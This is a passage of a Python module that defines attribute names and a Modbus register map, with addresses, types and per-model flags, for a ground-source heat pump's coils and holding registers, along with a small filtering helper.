ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STARTING_FAN_2 = "holding_surplus_heat_opening_degree_for_starting_fan_2"
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STOPPING_FAN_1 = "holding_surplus_heat_opening_degree_for_stopping_fan_1"
ATTR_HOLDING_SURPLUS_HEAT_OPENING_DEGREE_FOR_STOPPING_FAN_2 = "holding_surplus_heat_opening_degree_for_stopping_fan_2"
ATTR_HOLDING_SURPLUS_HEAT_LOWEST_ALLOWED_OPENING_DEGREE = "holding_surplus_heat_lowest_allowed_opening_degree"
ATTR_HOLDING_SURPLUS_HEAT_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_surplus_heat_highest_allowed_opening_degree"
ATTR_HOLDING_POOL_CHARGE_SET_POINT = "holding_pool_charge_set_point"
ATTR_HOLDING_POOL_MIX_VALVE_LOWEST_ALLOWED_OPENING_DEGREE = "holding_pool_mix_valve_lowest_allowed_opening_degree"
ATTR_HOLDING_POOL_MIX_VALVE_HIGHEST_ALLOWED_OPENING_DEGREE = "holding_pool_mix_valve_highest_allowed_opening_degree"
ATTR_HOLDING_GEAR_SHIFT_DELAY_HEATING = "holding_gear_shift_delay_heating"
ATTR_HOLDING_GEAR_SHIFT_DELAY_POOL = "holding_gear_shift_delay_pool"
ATTR_HOLDING_GEAR_SHIFT_DELAY_COOLING = "holding_gear_shift_delay_cooling"
ATTR_HOLDING_BRINE_IN_HIGH_ALARM_LIMIT = "holding_brine_in_high_alarm_limit"
ATTR_HOLDING_BRINE_IN_LOW_ALARM_LIMIT = "holding_brine_in_low_alarm_limit"
ATTR_HOLDING_BRINE_OUT_LOW_ALARM_LIMIT = "holding_brine_out_low_alarm_limit"
ATTR_HOLDING_BRINE_MAX_DELTA_LIMIT = "holding_brine_max_delta_limit"
ATTR_HOLDING_HOT_GAS_PUMP_START_TEMPERATURE_DISCHARGE_PIPE = "holding_hot_gas_pump_start_temperature_discharge_pipe"
ATTR_HOLDING_HOT_GAS_PUMP_LOWER_STOP_LIMIT_TEMPERATURE_DISCHARGE_PIPE = "holding_hot_gas_pump_lower_stop_limit_temperature_discharge_pipe"
ATTR_HOLDING_HOT_GAS_PUMP_UPPER_STOP_LIMIT_TEMPERATURE_DISCHARGE_PIPE = "holding_hot_gas_pump_upper_stop_limit_temperature_discharge_pipe"
ATTR_HOLDING_EXTERNAL_ADDITIONAL_HEATER_START = "holding_external_additional_heater_start"
ATTR_HOLDING_CONDENSER_PUMP_LOWEST_ALLOWED_SPEED = "holding_condenser_pump_lowest_allowed_speed"
ATTR_HOLDING_BRINE_PUMP_LOWEST_ALLOWED_SPEED = "holding_brine_pump_lowest_allowed_speed"
ATTR_HOLDING_EXTERNAL_ADDITIONAL_HEATER_STOP = "holding_external_additional_heater_stop"
ATTR_HOLDING_CONDENSER_PUMP_HIGHEST_ALLOWED_SPEED = "holding_condenser_pump_highest_allowed_speed"
ATTR_HOLDING_BRINE_PUMP_HIGHEST_ALLOWED_SPEED = "holding_brine_pump_highest_allowed_speed"
ATTR_HOLDING_CONDENSER_PUMP_STANDBY_SPEED = "holding_condenser_pump_standby_speed"
ATTR_HOLDING_BRINE_PUMP_STANDBY_SPEED = "holding_brine_pump_standby_speed"
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_POOL = "holding_minimum_allowed_gear_in_pool"
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_POOL = "holding_maximum_allowed_gear_in_pool"
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_COOLING = "holding_minimum_allowed_gear_in_cooling"
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_COOLING = "holding_maximum_allowed_gear_in_cooling"
ATTR_HOLDING_START_TEMP_FOR_COOLING = "holding_start_temp_for_cooling"
ATTR_HOLDING_STOP_TEMP_FOR_COOLING = "holding_stop_temp_for_cooling"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_1 = "holding_min_limitation_set_point_curve_radiator_mix_valve_1"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_1 = "holding_max_limitation_set_point_curve_radiator_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_1_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_2_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_3_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_4_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_5_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_6_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_7_mix_valve_1"
ATTR_HOLDING_FIXED_SYSTEM_SUPPLY_SET_POINT = "holding_fixed_system_supply_set_point"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_2 = "holding_min_limitation_set_point_curve_radiator_mix_valve_2"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_2 = "holding_max_limitation_set_point_curve_radiator_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_1_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_2_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_3_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_4_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_5_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_6_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_7_mix_valve_2"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_3 = "holding_min_limitation_set_point_curve_radiator_mix_valve_3"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_3 = "holding_max_limitation_set_point_curve_radiator_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_1_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_2_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_3_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_4_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_5_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_6_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_7_mix_valve_3"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_4 = "holding_min_limitation_set_point_curve_radiator_mix_valve_4"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_4 = "holding_max_limitation_set_point_curve_radiator_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_1_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_2_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_3_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_4_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_5_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_6_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_7_mix_valve_4"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_5 = "holding_min_limitation_set_point_curve_radiator_mix_valve_5"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_5 = "holding_max_limitation_set_point_curve_radiator_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_1_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_2_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_3_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_4_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_5_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_6_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_7_mix_valve_5"
ATTR_HOLDING_SET_POINT_RETURN_TEMP_FROM_POOL_TO_HEAT_EXCHANGER = "holding_set_point_return_temp_from_pool_to_heat_exchanger"
ATTR_HOLDING_SET_POINT_POOL_HYSTERESIS = "holding_set_point_pool_hysteresis"
ATTR_HOLDING_SET_POINT_FOR_SUPPLY_LINE_TEMP_PASSIVE_COOLING_WITH_MIXING_VALVE_1 = "holding_set_point_for_supply_line_temp_passive_cooling_with_mixing_valve_1"
ATTR_HOLDING_SET_POINT_MINIMUM_OUTDOOR_TEMP_WHEN_COOLING_IS_PERMITTED = "holding_set_point_minimum_outdoor_temp_when_cooling_is_permitted"
ATTR_HOLDING_EXTERNAL_HEATER_OUTDOOR_TEMP_LIMIT = "holding_external_heater_outdoor_temp_limit"
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_2 = "holding_selected_mode_for_mixing_valve_2"
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_2 = "holding_desired_cooling_temperature_setpoint_mixing_valve_2"
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_2 = "holding_seasonal_cooling_temperature_outdoor_mixing_valve_2"
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_2 = "holding_seasonal_heating_temperature_outdoor_mixing_valve_2"
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_3 = "holding_selected_mode_for_mixing_valve_3"
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_3 = "holding_desired_cooling_temperature_setpoint_mixing_valve_3"
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_3 = "holding_seasonal_cooling_temperature_outdoor_mixing_valve_3"
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_3 = "holding_seasonal_heating_temperature_outdoor_mixing_valve_3"
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_4 = "holding_selected_mode_for_mixing_valve_4"
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_4 = "holding_desired_cooling_temperature_setpoint_mixing_valve_4"
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_4 = "holding_seasonal_cooling_temperature_outdoor_mixing_valve_4"
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_TEMP_MIXING_VALVE_4 = "holding_seasonal_heating_temperature_outdoor_temp_mixing_valve_4"
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_5 = "holding_selected_mode_for_mixing_valve_5"
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_5 = "holding_desired_cooling_temperature_setpoint_mixing_valve_5"
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_5 = "holding_seasonal_cooling_temperature_outdoor_mixing_valve_5"
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_5 = "holding_seasonal_heating_temperature_outdoor_mixing_valve_5"
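
# The REGISTERS table below maps each attribute name to its Modbus metadata:
# register address, register type, scale factor, datatype and per-model
# availability flags (MODEL_MEGA / MODEL_INVERTER).
#
# Minimal usage sketch (an illustrative assumption, not part of the original
# API): collect {attribute_name: address} for one register type on one model,
# e.g. when grouping Modbus reads. The helper name is hypothetical; it only
# uses the KEY_* and MODEL_* constants defined in this module and the
# REGISTERS table defined just below (looked up at call time).
def _registers_for_model(model_key, reg_type):
    """Return {attribute_name: address} for registers of the given type that
    are flagged as available on the given model (e.g. MODEL_MEGA)."""
    return {
        name: meta[KEY_ADDRESS]
        for name, meta in REGISTERS.items()
        if meta[KEY_REG_TYPE] == reg_type and meta.get(model_key, False)
    }
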
REGISTERS = {
ATTR_COIL_RESET_ALL_ALARMS:
{ KEY_ADDRESS: 3, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_INTERNAL_ADDITIONAL_HEATER:
{ KEY_ADDRESS: 4, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_EXTERNAL_ADDITIONAL_HEATER:
{ KEY_ADDRESS: 5, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_HGW:
{ KEY_ADDRESS: 6, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_FLOW_SWITCH_PRESSURE_SWITCH:
{ KEY_ADDRESS: 7, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_TAP_WATER:
{ KEY_ADDRESS: 8, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_HEAT:
{ KEY_ADDRESS: 9, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_ACTIVE_COOLING:
{ KEY_ADDRESS: 10, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_MIX_VALVE_1:
{ KEY_ADDRESS: 11, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_TWC:
{ KEY_ADDRESS: 12, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_WCS:
{ KEY_ADDRESS: 13, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_HOT_GAS_PUMP:
{ KEY_ADDRESS: 14, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_MIX_VALVE_2:
{ KEY_ADDRESS: 16, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_MIX_VALVE_3:
{ KEY_ADDRESS: 17, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_MIX_VALVE_4:
{ KEY_ADDRESS: 18, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_MIX_VALVE_5:
{ KEY_ADDRESS: 19, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_BRINE_OUT_MONITORING:
{ KEY_ADDRESS: 20, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_BRINE_PUMP_CONTINUOUS_OPERATION:
{ KEY_ADDRESS: 21, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_SYSTEM_CIRCULATION_PUMP:
{ KEY_ADDRESS: 22, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION:
{ KEY_ADDRESS: 23, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_ANTI_LEGIONELLA:
{ KEY_ADDRESS: 24, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_ADDITIONAL_HEATER_ONLY:
{ KEY_ADDRESS: 25, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_CURRENT_LIMITATION:
{ KEY_ADDRESS: 26, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_POOL:
{ KEY_ADDRESS: 28, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_SURPLUS_HEAT_CHILLER:
{ KEY_ADDRESS: 29, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_SURPLUS_HEAT_BOREHOLE:
{ KEY_ADDRESS: 30, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_EXTERNAL_ADDITIONAL_HEATER_FOR_POOL:
{ KEY_ADDRESS: 31, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_INTERNAL_ADDITIONAL_HEATER_FOR_POOL:
{ KEY_ADDRESS: 32, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_PASSIVE_COOLING:
{ KEY_ADDRESS: 33, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_VARIABLE_SPEED_MODE_FOR_CONDENSER_PUMP:
{ KEY_ADDRESS: 34, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_VARIABLE_SPEED_MODE_FOR_BRINE_PUMP:
{ KEY_ADDRESS: 35, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_COOLING_MODE_FOR_MIXING_VALVE_1:
{ KEY_ADDRESS: 36, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_1:
{ KEY_ADDRESS: 37, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_1:
{ KEY_ADDRESS: 38, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_EXTERNAL_HEATER:
{ KEY_ADDRESS: 39, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_BRINE_IN_MONITORING:
{ KEY_ADDRESS: 40, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_FIXED_SYSTEM_SUPPLY_SET_POINT:
{ KEY_ADDRESS: 41, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_EVAPORATOR_FREEZE_PROTECTION:
{ KEY_ADDRESS: 42, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_2:
{ KEY_ADDRESS: 43, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_2:
{ KEY_ADDRESS: 44, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_2:
{ KEY_ADDRESS: 45, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_3:
{ KEY_ADDRESS: 46, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_3:
{ KEY_ADDRESS: 47, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_3:
{ KEY_ADDRESS: 48, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_4:
{ KEY_ADDRESS: 49, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_4:
{ KEY_ADDRESS: 50, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_4:
{ KEY_ADDRESS: 51, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_5:
{ KEY_ADDRESS: 52, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_5:
{ KEY_ADDRESS: 53, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_5:
{ KEY_ADDRESS: 54, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_2:
{ KEY_ADDRESS: 55, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_3:
{ KEY_ADDRESS: 56, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_4:
{ KEY_ADDRESS: 57, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_5:
{ KEY_ADDRESS: 58, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_A:
{ KEY_ADDRESS: 0, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_B:
